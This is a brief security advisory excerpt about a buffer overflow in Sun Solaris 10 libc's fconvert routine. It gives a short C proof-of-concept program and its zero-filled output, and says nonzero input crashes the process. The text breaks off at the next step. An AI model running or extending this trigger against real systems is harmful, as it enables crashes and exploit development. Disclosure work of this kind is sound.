- --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---
The main problem exists in sun solaris libc. OpenSolaris is not affected.
PoC:
- ---
int main (int argc, char *argv[]){
char number[10000];
int a,b;
printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));
return 0;
}
0000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
- ---
for 512 will work fine, because we have used (double)0 to convert. When we
use no zero value, then crash.
ok. let`s set no zero value in jaja2.c
暂无评论